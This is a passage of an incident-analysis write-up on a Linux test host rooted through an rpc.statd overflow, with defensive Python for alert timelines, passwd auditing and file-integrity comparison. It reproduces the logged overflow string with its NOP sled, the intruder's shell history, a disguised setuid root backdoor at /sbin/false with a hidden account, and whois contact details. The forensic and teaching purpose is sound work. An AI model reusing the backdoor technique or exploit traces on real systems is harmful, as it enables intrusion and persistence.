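    ("success", "id check returned root"),  # 'uid=0(root)' leaving the victim over TCP
)


def parse_alert(line):
    m = ALERT_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised alert line: %r" % line)
    ts = datetime.strptime("%d %s %s %s" % (ASSUMED_YEAR, m["mon"], m["day"], m["time"]),
                           "%Y %b %d %H:%M:%S")
    stage = next((s for s, needle in STAGES if needle in m["msg"]), "other")
    return {"ts": ts, "msg": m["msg"], "stage": stage,
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"])}


def build_timeline(text):
    """Parse, sort, and annotate each alert with the gap since the previous one and
    whether its source port is privileged (< 1024), as the analysis above points out.
    Syslog has one-second resolution; the sub-second gap is only visible in the dumps."""
    alerts = sorted((parse_alert(l) for l in text.splitlines() if l.strip()),
                    key=lambda a: a["ts"])
    prev = None
    for a in alerts:
        a["gap_s"] = (a["ts"] - prev["ts"]).total_seconds() if prev else 0.0
        a["privileged_sport"] = a["sport"] < 1024
        prev = a
    return alerts


def correlate(alerts):
    """Fold alerts into incidents keyed by (attacker, victim). The 'success' hit is
    the victim's reply, so its addresses are swapped before keying."""
    incidents = {}
    for a in alerts:
        key = (a["dst"], a["src"]) if a["stage"] == "success" else (a["src"], a["dst"])
        inc = incidents.setdefault(key, {
            "attacker": key[0], "victim": key[1], "first": a["ts"], "last": a["ts"],
            "counts": {"recon": 0, "exploit": 0, "success": 0, "other": 0}})
        inc["counts"][a["stage"]] += 1
        inc["last"] = max(inc["last"], a["ts"])
    for inc in incidents.values():
        c = inc["counts"]
        inc["compromised"] = c["exploit"] > 0 and c["success"] > 0
        inc["span_s"] = (inc["last"] - inc["first"]).total_seconds()
    return list(incidents.values())


if __name__ == "__main__":
    tl = build_timeline(ALERTS)
    for a in tl:
        print("%s +%4.0fs %-8s %s:%d -> %s:%d%s" % (
            a["ts"].time(), a["gap_s"], a["stage"], a["src"], a["sport"], a["dst"],
            a["dport"], "  [privileged source port]" if a["privileged_sport"] else ""))
    for inc in correlate(tl):
        print(inc["attacker"], "->", inc["victim"], inc["counts"],
              "compromised" if inc["compromised"] else "no root shell seen")
```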
All traffic alerted on from this attacking host (148.243.136.7) can be viewed at the link below. While this host did conduct portmap scans of several of our networks AFTER this compromise, it was not observed doing so prior to this break-in. It seems that this attacker had some previous knowledge that the portmapper was running on port 111 of this victim host. So, my summary would be that this victim host was not the sole target of this attacker, as this same attacking host was later observed scanning large ranges of IP space looking for portmapper daemons. It is concerning, however, that he/she went right to this host and successfully compromised it, and that this was the first activity we ever saw from this attacking host.

Detect 2 - Scans from this attacking host (148.243.136.7)

### Severity: 3

(criticality 2 + lethality 5, less system countermeasures 1 and network countermeasures 3)

Criticality: 2
This system was a test system placed on the public network without prior approval from the Security Department. It was a stock Redhat 6.2 box with "everything" installed. It didn't survive long in the real world, but it was only a test system, and the engineer had all of his data replicated elsewhere. Further, this box was not dual-homed into any private network segment(s), nor was it "trusted" by any other host, so collateral damage was limited.

Lethality: 5
This system gave up root level access after its rpc.statd daemon was successfully compromised via the internet.

System Countermeasures: 1
Okay, the OS was reasonably up-to-date, and the root password was not "root," "password," or "toor." I'll give him that; otherwise this box was about as safe as a tourist who drinks the water in Mexico City. The system was unpatched and ran every dangerous, unneeded service that could be activated. I suppose the fact that it was compromised is another indicator that perhaps this host was not up to par. :)

Network Countermeasures: 3
I am, perhaps, being generous here. This host was placed on the network in such a way that the PIX was not filtering any traffic for it.
It was completely unprotected. The only reason I give it a '3' here is because the network IDS caught this very quickly and the host was taken offline within about 20 minutes.

9. Defensive recommendation:

This incident helped to change the suggestion that systems be approved before being placed onto the public network into a policy. Future systems so placed had to be approved by the Security Department prior to going live on the network. Generally speaking, I would recommend that the victim and all other systems to be placed on the publicly accessible internet be protected by a restrictively configured firewall. Short of this, this was a Linux system and it would have been trivial to add ipchains rules to this host so that it could do some filtering of its own. Further, such systems should be audited to ensure that they run only the services needed to perform their function. This box had no need of portmapper or rpc services. Once it is determined which services are required, the latest versions of those programs should be identified and installed.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Detect 2 - Forensics Performed On Host
==========================================================================

Name:    na-148-243-131-7.na.avantel.net.mx
Address: 148.243.136.7

##################

[~]$ whois 148.243.136.7 nsl
NIC-Mexico (NETBLK-REDMEX-BNETS)             REDMEX-BNETS   148.203.0.0 - 148.250.255.255
Avantel, S.A. (NETBLK-AVANTEL-BL11)          AVANTEL-BL11   148.243.0.0 - 148.243.255.255
CAPITEL SYSTEMS SA DE CV (NETBLK-CAPSYS-MX)  CAPSYS-MX      148.243.136.0 - 148.243.136.127

###################################

na-148-243-131-7.na.avantel.net.mx

NIC-Mexico (NETBLK-REDMEX-BNETS)
   Av. Eugenio Garza Sada #2501 Sur
   Monterrey, Nuevo Leon 64849
   MX

   Netname: REDMEX-BNETS
   Netblock: 148.203.0.0 - 148.250.255.255
   Maintainer: MEX

   Coordinator:
      Mexico, Administrador Ip  (AIM4-ARIN)  ipmaster@NIC.MX
      +52(8) 3875346 (FAX) (8) 3284208

   Record last updated on 18-May-1999.
   Database last updated on 5-Mar-2001 06:33:54 EDT.

########################################

Avantel, S.A. (NETBLK-AVANTEL-BL11)
   Vasconcelos 130 ote
   San Pedro, Nuevo Leon 66267
   MX

   Netname: AVANTEL-BL11
   Netblock: 148.243.0.0 - 148.243.255.255
   Maintainer: AVAN

   Coordinator:
      Administrator, Noc  (NA83-ARIN)  noc@AVANTEL.NET.MX
      (8) 156 3065

   Domain System inverse mapping provided by:

   DNS1.AVANTEL.NET.MX          200.33.213.66
   DNS2.AVANTEL.NET.MX          200.33.209.66

   Record last updated on 23-Sep-1999.
   Database last updated on 5-Mar-2001 06:33:54 EDT.

#############################################

CAPITEL SYSTEMS SA DE CV (NETBLK-CAPSYS-MX)
   SOR JUANA INES DE LA CRUZ 400 NTE
   TAMPICO, TM 89000
   Mexico

   Netname: CAPSYS-MX
   Netblock: 148.243.136.0 - 148.243.136.127

   Coordinator:
      RODRIGUEZ, ADOLFO  (AR324-ARIN)  arlatt@hotmail.com
      (1) 2186416

   Record last updated on 04-May-2000.
   Database last updated on 5-Mar-2001 06:33:54 EDT.

==========================================================================

###border###

last reveals that /var/log/wtmp was apparently not tampered with.

reboot   system boot  2.2.14-5.0smp    Mon Mar 5 12:46          (1+06:28)
sdr      pts/1        200.51.210.75    Mon Mar 5 06:20 - 06:20  (00:00)
sdr      pts/0        200.51.210.75    Mon Mar 5 06:16 - 06:20  (00:04)
sdr      pts/0        200.51.210.75    Mon Mar 5 03:32 - 03:32  (00:00)
root     tty2                          Thu Mar 1 08:42 - 09:56  (4+01:13)

wtmp begins Thu Mar 1 08:42:54 2001

###border###

/var/log/messages shows the initial buffer overflow of rpc.statd. At this point the intruder had root privilege on the system.
(The =XX sequences in the first line below are the mail archive's quoted-printable encoding of the non-printable bytes rpc.statd logged; =F7=FF=BF are stack-address bytes and =90 is the 0x90 NOP byte of the sled seen in the packet dump.)

Mar 5 03:21:54 vpn1 rpc.statd[433]: gethostbyname error for ^X=F7=FF=BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7=FF=BF bffff750 8049710 8052c18687465676274736f6d616e797265206520726f7220726f66 bffff718 bffff719 bffff71a bffff71b=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90
Mar 5 03:32:04 vpn1 PAM_pwdb[11238]: password for (sdr/503) changed by ((null)/0)
Mar 5 03:32:35 vpn1 PAM_pwdb[11240]: (login) session opened for user sdr by (uid=0)
Mar 5 03:32:42 vpn1 inetd[763]: pid 11239: exit status 1
Mar 5 04:02:00 vpn1 anacron[11276]: Updated timestamp for job `cron.daily' to 2001-03-05
Mar 5 04:02:05 vpn1 PAM_pwdb[11389]: (su) session opened for user news by (uid=0)
Mar 5 04:02:05 vpn1 PAM_pwdb[11389]: (su) session closed for user news
Mar 5 06:16:01 vpn1 PAM_pwdb[11473]: (login) session opened for user sdr by (uid=0)
Mar 5 06:20:01 vpn1 PAM_pwdb[14152]: (login) session opened for user sdr by (uid=0)
Mar 5 06:20:12 vpn1 PAM_pwdb[14152]: (login) session closed for user sdr
Mar 5 06:20:12 vpn1 inetd[763]: pid 14151: exit status 1
Mar 5 06:20:16 vpn1 PAM_pwdb[11473]: (login) session closed for user sdr
Mar 5 06:20:16 vpn1 inetd[763]: pid 11472: exit status 1

###border###

The intruder then added a regular user account to /etc/passwd. I estimate that /etc/passwd- shows what the /etc/passwd file temporarily looked like. It is important to note that the new user sdr's home directory is /tmp. The reason for this will become clear later.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
piranha:x:60:60::/home/httpd/html/piranha:/dev/null
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
pvm:x:24:24::/usr/share/pvm3:/bin/bash
squid:x:23:23::/var/spool/squid:/dev/null
sdr:x:503:503::/tmp:/bin/bash

###border###

The intruder then altered the passwd file to obscure the new account by placing it in the middle of the passwd file. Also, the sdr user's uid and gid are changed, the home directory is changed to more closely emulate the home directory of other system daemons, and finally the shell is altered to /sbin/false. The shell change is apparently meant to suggest that this user can't log in, as it has no shell.
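The edits described above can be checked mechanically. The following Python is an added example, not part of the original report: it parses two passwd(5) snapshots (abbreviated copies of the /etc/passwd- listing above and the final /etc/passwd listing that follows, embedded as constructed sample data) and reports the tampering patterns seen here: an account absent from the trusted install, a home directory under /tmp or /var/tmp, a uid lowered into the system-account range, per-field changes between snapshots, and an entry whose neighbours both changed, which is how a line moved into the middle of the file shows up. TRUSTED_ACCOUNTS and UID_MIN = 500 are assumptions about a stock Red Hat 6.2 install.

```python
"""Audit /etc/passwd snapshots for the tampering described in the report.

Added example, not part of the original report. The two snapshots are
abbreviated copies of the listings in this section; TRUSTED_ACCOUNTS and
UID_MIN are assumptions about a stock Red Hat 6.2 install.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# /etc/passwd- as it looked right after the account was added (constructed, abbreviated).
PASSWD_BACKUP = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
sdr:x:503:503::/tmp:/bin/bash
"""

# /etc/passwd after the intruder's edits (constructed, abbreviated).
PASSWD_FINAL = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
mail:x:8:12:mail:/var/spool/mail:
sdr:x:20:20:sdr:/var/spool/sdr:/sbin/false
news:x:9:13:news:/var/spool/news:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
"""

TRUSTED_ACCOUNTS = {"root", "bin", "daemon", "mail", "news", "nobody", "xfs"}  # assumption
UID_MIN = 500            # first ordinary-user uid on Red Hat 6.2 (assumption)
SCRATCH_DIRS = ("/tmp", "/var/tmp")


@dataclass
class Entry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str
    before: Optional[str]   # neighbouring account names, used to spot reordering
    after: Optional[str]


def parse_passwd(text: str) -> Dict[str, Entry]:
    """Parse passwd(5) text, keeping file order via the before/after links."""
    rows = [line.split(":") for line in text.splitlines() if line.strip()]
    for row in rows:
        if len(row) != 7:
            raise ValueError(f"malformed passwd line: {':'.join(row)!r}")
    names = [row[0] for row in rows]
    entries: Dict[str, Entry] = {}
    for i, (name, _pw, uid, gid, gecos, home, shell) in enumerate(rows):
        entries[name] = Entry(name, int(uid), int(gid), gecos, home, shell,
                              names[i - 1] if i > 0 else None,
                              names[i + 1] if i + 1 < len(names) else None)
    return entries


def in_scratch(home: str) -> bool:
    return any(home == d or home.startswith(d + "/") for d in SCRATCH_DIRS)


def audit_passwd(current: str, baseline: Optional[str] = None) -> List[Tuple[str, str]]:
    """Return (account, finding) pairs for `current`, optionally diffed against `baseline`."""
    cur = parse_passwd(current)
    base = parse_passwd(baseline) if baseline else {}
    findings: List[Tuple[str, str]] = []
    for name, e in cur.items():
        if name not in TRUSTED_ACCOUNTS:
            findings.append((name, "not in trusted install"))
            if e.uid < UID_MIN:
                findings.append((name, f"uid {e.uid} below UID_MIN, looks like a system account"))
        if e.uid == 0 and name != "root":
            findings.append((name, "uid 0 on a non-root account"))
        if in_scratch(e.home):
            findings.append((name, f"home directory in scratch area {e.home}"))
        b = base.get(name)
        if b is None:
            continue
        for field in ("uid", "gid", "home", "shell"):
            old, new = getattr(b, field), getattr(e, field)
            if old != new:
                findings.append((name, f"{field} changed {old!r} -> {new!r}"))
        # Both neighbours differ: the line was moved, not merely shifted by an insert nearby.
        if b.before != e.before and b.after != e.after:
            findings.append((name, f"moved: was after {b.before}, now after {e.before}"))
    return findings


if __name__ == "__main__":
    for snapshot, base in ((PASSWD_BACKUP, None), (PASSWD_FINAL, PASSWD_BACKUP)):
        for account, finding in audit_passwd(snapshot, base):
            print(f"{account}: {finding}")
```

On a live system, feed it /etc/passwd and /etc/passwd- read from a trusted shell or a mounted image; comparing against the pristine passwd of the same release catches the moved line even after the backup has been overwritten by a later edit.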
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
sdr:x:20:20:sdr:/var/spool/sdr:/sbin/false
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
piranha:x:60:60::/home/httpd/html/piranha:/dev/null
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
pvm:x:24:24::/usr/share/pvm3:/bin/bash
squid:x:23:23::/var/spool/squid:/dev/null

###border###

Having recalled that the user sdr's home directory was initially /tmp, we examine /tmp/.bash_history. It is becoming clear that the intruder did not have the time, interest, or ability to hide his/her tracks very well. It struck me as odd that such attention to detail was given to the /etc/passwd file while other obvious log and accounting information was left unsanitized. This .bash_history file is very revealing. It shows an interesting event in that a file called 'sush' (something like superuser shell?) is copied to /sbin/false. Also, the 'cat > tmp' is apparently where he/she entered a script from stdin. This file no longer exists, so some of the intruder's actions are lost. While a full forensic effort might have revealed the data still on the drive platters, grave robbing such as this could have occupied days to weeks. Also, since we initially decided not to remove the hard drives, it is likely that we have altered the disks sufficiently to reduce our ability to retrieve this information. Given the criticality and limited damage, the value of this host and therefore its forensic/evidentiary value, I don't believe we've sacrificed any useful data.

w
ls
uname -a
cp sush /sbin/false
pico /etc/passwd
pico /etc/passwd
pico /etc/passwd
pico /etc/shadow
ls
rm *
exit
w
cd /var/tmp
ls
ls -al
cd /tmp
ls -al
cd /var/tmp
ls
cat > tmp
chmod +x tmp
./tmp
exit

###border###

Running 'strings' on the binary /sbin/false file reveals the following. While not complete information, it certainly does appear to turn over a root shell to sdr when he/she logs in.

/lib/ld-linux.so.2
__gmon_start__
libc.so.6
system
__deregister_frame_info
setgid
_IO_stdin_used
__libc_start_main
setuid
__register_frame_info
GLIBC_2.0
PTRh
QVh8
/bin/bash

###border###

A comparison of the compromised system's md5sums and file stat information to that of a new full RedHat 6.2 install reveals changes in keeping with the activity we have witnessed thus far. While evidence of backdoors/trojans/rootkits is limited, this box is still compromised and no longer trustworthy. It will be wiped clean and re-installed by XXXXXXXXX with XXXXXXXXXXX's new internal Linux distribution (which was specifically designed for our company's needs, with security in mind). This will give XXXXXXXXX a strong base image from which to build. Note that the integrity check results below were collected trusting only Perl on the compromised system. The md5 implementation was completely self-contained in the forensic Perl script. (Special thanks go to Dan Farmer for posting his EMT script to the TCT mailing list. This was the tool used to do this quick and dirty file integrity test.)
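As an added example (not the EMT script the report used, and not part of the original page), here is a stand-alone Python version of the same quick integrity comparison: hash every file in a suspect tree and in a trusted reference tree with a self-contained MD5 (hashlib), then sort the differences into the report's three buckets, new set-uid/set-gid files, changed executables and changed non-executables, plus new, missing and mode-changed files. The demo() function builds both trees in temporary directories with constructed contents modelled on the findings below; the paths and contents it writes are placeholders, not files from the compromised host.

```python
"""Compare a suspect file tree against a trusted baseline (added example, not
the report's EMT script). Standard library only: hashlib for MD5, lstat for modes."""
import hashlib
import os
import stat
import tempfile
from typing import Dict, List, Tuple

Snapshot = Dict[str, Tuple[str, int]]   # path -> (md5 hex digest, st_mode)


def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot_tree(root: str) -> Snapshot:
    """Hash every regular file under root; symlinks are recorded by target, not followed."""
    snap: Snapshot = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                digest = hashlib.md5(os.readlink(full).encode()).hexdigest()
            elif stat.S_ISREG(st.st_mode):
                digest = md5_file(full)
            else:
                continue
            snap["/" + os.path.relpath(full, root)] = (digest, st.st_mode)
    return snap


def is_sxid(mode: int) -> bool:
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def is_exec(mode: int) -> bool:
    return bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def classify_changes(trusted: Snapshot, suspect: Snapshot) -> Dict[str, List[str]]:
    """Bucket the differences between two snapshots; every list is sorted by path."""
    report: Dict[str, List[str]] = {
        "new_sxid": [], "new_files": [], "changed_exec": [],
        "changed_nonexec": [], "mode_changed": [], "missing_files": [],
    }
    for path, (digest, mode) in sorted(suspect.items()):
        if path not in trusted:
            report["new_files"].append(path)
            if is_sxid(mode):
                report["new_sxid"].append(path)
            continue
        t_digest, t_mode = trusted[path]
        if digest != t_digest:
            report["changed_exec" if is_exec(mode) else "changed_nonexec"].append(path)
        if stat.S_IMODE(mode) != stat.S_IMODE(t_mode):
            report["mode_changed"].append(path)
        if is_sxid(mode) and not is_sxid(t_mode):
            report["new_sxid"].append(path)   # a set-id bit added to an existing file
    report["missing_files"] = sorted(set(trusted) - set(suspect))
    return report


def _write(root: str, path: str, data: str, mode: int = 0o644) -> None:
    full = os.path.join(root, path.lstrip("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(data)
    os.chmod(full, mode)


def demo() -> Dict[str, List[str]]:
    """Build a small trusted tree and a tampered copy (constructed placeholder contents)."""
    with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as suspect:
        for root in (trusted, suspect):
            _write(root, "/bin/false", "#!/bin/sh\nexit 1\n", 0o755)
            _write(root, "/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
            _write(root, "/etc/inetd.conf", "# stock inetd.conf\n")
            _write(root, "/usr/bin/tool", "#!/bin/sh\necho tool\n", 0o755)
        # Tampering: a new set-uid file, an added account, a modified executable.
        _write(suspect, "/sbin/false", "sush placeholder\n", 0o4755)
        _write(suspect, "/etc/passwd",
               "root:x:0:0:root:/root:/bin/bash\nsdr:x:20:20:sdr:/var/spool/sdr:/sbin/false\n")
        _write(suspect, "/usr/bin/tool", "#!/bin/sh\necho not the installed tool\n", 0o755)
        return classify_changes(snapshot_tree(trusted), snapshot_tree(suspect))


if __name__ == "__main__":
    for bucket, paths in demo().items():
        print(f"{bucket}: {paths}")
```

In a real investigation, take the trusted snapshot from a clean installation of the same release and the suspect snapshot from a mounted, read-only copy of the disk, so that neither the suspect system's interpreter nor its md5sum binary has to be trusted; for a new baseline, prefer sha256 over MD5, whose collision weaknesses are well established.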
The following SxID files are new:
/sbin/false

The following Executable files changed from the trusted dist:
/usr/doc/libtool-1.3.4/demo/configure

The following non-executable files changed from the trusted dist:
/boot/kernel.h
/etc/X11/fs/config
/etc/conf.linuxconf
/etc/group
/etc/httpd/conf/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/php3.ini
/etc/inetd.conf
/etc/info-dir
/etc/localtime
/etc/mime.types
/etc/pam.d/login
/etc/pam.d/passwd
/etc/pam.d/rlogin
/etc/passwd
/etc/services
/etc/sysconfig/pcmcia
/etc/sysctl.conf
/etc/syslog.conf
/lib/modules/2.2.14-5.0/block/DAC960.o
/lib/modules/2.2.14-5.0/block/cpqarray.o
/lib/modules/2.2.14-5.0/block/ide-floppy.o
/lib/modules/2.2.14-5.0/block/ide-tape.o
/lib/modules/2.2.14-5.0/block/linear.o
/lib/modules/2.2.14-5.0/block/loop.o
/lib/modules/2.2.14-5.0/block/nbd.o
/lib/modules/2.2.14-5.0/block/raid0.o
/lib/modules/2.2.14-5.0/block/raid1.o
/lib/modules/2.2.14-5.0/block/raid5.o
/lib/modules/2.2.14-5.0/block/xd.o
/lib/modules/2.2.14-5.0/cdrom/aztcd.o
/lib/modules/2.2.14-5.0/cdrom/cdu31a.o
/lib/modules/2.2.14-5.0/cdrom/cm206.o
/lib/modules/2.2.14-5.0/cdrom/gscd.o
/lib/modules/2.2.14-5.0/cdrom/isp16.o
/lib/modules/2.2.14-5.0/cdrom/mcd.o
/lib/modules/2.2.14-5.0/cdrom/mcdx.o
/lib/modules/2.2.14-5.0/cdrom/optcd.o
/lib/modules/2.2.14-5.0/cdrom/sbpcd.o
/lib/modules/2.2.14-5.0/cdrom/sjcd.o
/lib/modules/2.2.14-5.0/cdrom/sonycd535.o
/lib/modules/2.2.14-5.0/fs/autofs.o
/lib/modules/2.2.14-5.0/fs/binfmt_aout.o
/lib/modules/2.2.14-5.0/fs/binfmt_java.o
/lib/modules/2.2.14-5.0/fs/binfmt_misc.o
/lib/modules/2.2.14-5.0/fs/coda.o
/lib/modules/2.2.14-5.0/fs/fat.o
/lib/modules/2.2.14-5.0/fs/hfs.o
/lib/modules/2.2.14-5.0/fs/hpfs.o
/lib/modules/2.2.14-5.0/fs/lockd.o
/lib/modules/2.2.14-5.0/fs/minix.o
/lib/modules/2.2.14-5.0/fs/msdos.o
/lib/modules/2.2.14-5.0/fs/ncpfs.o
/lib/modules/2.2.14-5.0/fs/nfs.o
/lib/modules/2.2.14-5.0/fs/nfsd.o
/lib/modules/2.2.14-5.0/fs/nls_cp437.o
/lib/modules/2.2.14-5.0/fs/nls_cp737.o
/lib/modules/2.2.14-5.0/fs/nls_cp775.o
/lib/modules/2.2.14-5.0/fs/nls_cp850.o
/lib/modules/2.2.14-5.0/fs/nls_cp852.o
/lib/modules/2.2.14-5.0/fs/nls_cp855.o
/lib/modules/2.2.14-5.0/fs/nls_cp857.o
/lib/modules/2.2.14-5.0/fs/nls_cp860.o
/lib/modules/2.2.14-5.0/fs/nls_cp861.o
/lib/modules/2.2.14-5.0/fs/nls_cp862.o
/lib/modules/2.2.14-5.0/fs/nls_cp863.o
/lib/modules/2.2.14-5.0/fs/nls_cp864.o
/lib/modules/2.2.14-5.0/fs/nls_cp865.o
/lib/modules/2.2.14-5.0/fs/nls_cp866.o
/lib/modules/2.2.14-5.0/fs/nls_cp869.o
/lib/modules/2.2.14-5.0/fs/nls_cp874.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-1.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-14.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-15.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-2.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-3.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-4.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-5.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-6.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-7.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-8.o
/lib/modules/2.2.14-5.0/fs/nls_iso8859-9.o
/lib/modules/2.2.14-5.0/fs/nls_koi8-r.o
/lib/modules/2.2.14-5.0/fs/romfs.o
/lib/modules/2.2.14-5.0/fs/smbfs.o
/lib/modules/2.2.14-5.0/fs/sysv.o
/lib/modules/2.2.14-5.0/fs/ufs.o
/lib/modules/2.2.14-5.0/fs/umsdos.o
/lib/modules/2.2.14-5.0/fs/vfat.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_autofw.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_cuseeme.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_ftp.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_irc.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_mfw.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_portfw.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_quake.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_raudio.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_user.o
/lib/modules/2.2.14-5.0/ipv4/ip_masq_vdolive.o
/lib/modules/2.2.14-5.0/ipv4/ip_vs_lc.o
/lib/modules/2.2.14-5.0/ipv4/ip_vs_rr.o
/lib/modules/2.2.14-5.0/ipv4/ip_vs_wlc.o
/lib/modules/2.2.14-5.0/ipv4/ip_vs_wrr.o
/lib/modules/2.2.14-5.0/ipv4/rarp.o
/lib/modules/2.2.14-5.0/misc/aci.o
/lib/modules/2.2.14-5.0/misc/acquirewdt.o
/lib/modules/2.2.14-5.0/misc/actisys.o
/lib/modules/2.2.14-5.0/misc/ad1816.o
/lib/modules/2.2.14-5.0/misc/ad1848.o
/lib/modules/2.2.14-5.0/misc/adlib_card.o
/lib/modules/2.2.14-5.0/misc/aedsp16.o
/lib/modules/2.2.14-5.0/misc/aten.o
/lib/modules/2.2.14-5.0/misc/atixlmouse.o
/lib/modules/2.2.14-5.0/misc/awe_wave.o
/lib/modules/2.2.14-5.0/misc/b1.o
/lib/modules/2.2.14-5.0/misc/b1isa.o
/lib/modules/2.2.14-5.0/misc/b1pci.o
/lib/modules/2.2.14-5.0/misc/bpck.o
/lib/modules/2.2.14-5.0/misc/bttv.o
/lib/modules/2.2.14-5.0/misc/busmouse.o
/lib/modules/2.2.14-5.0/misc/buz.o
/lib/modules/2.2.14-5.0/misc/bw-qcam.o
/lib/modules/2.2.14-5.0/misc/c-qcam.o
/lib/modules/2.2.14-5.0/misc/capi.o
/lib/modules/2.2.14-5.0/misc/capidrv.o
/lib/modules/2.2.14-5.0/misc/capiutil.o
/lib/modules/2.2.14-5.0/misc/cmpci.o
/lib/modules/2.2.14-5.0/misc/comm.o
/lib/modules/2.2.14-5.0/misc/cs4232.o
/lib/modules/2.2.14-5.0/misc/cyclades.o
/lib/modules/2.2.14-5.0/misc/dstr.o
/lib/modules/2.2.14-5.0/misc/dtlk.o
/lib/modules/2.2.14-5.0/misc/emu10k1.o
/lib/modules/2.2.14-5.0/misc/epat.o
/lib/modules/2.2.14-5.0/misc/epca.o
/lib/modules/2.2.14-5.0/misc/epia.o
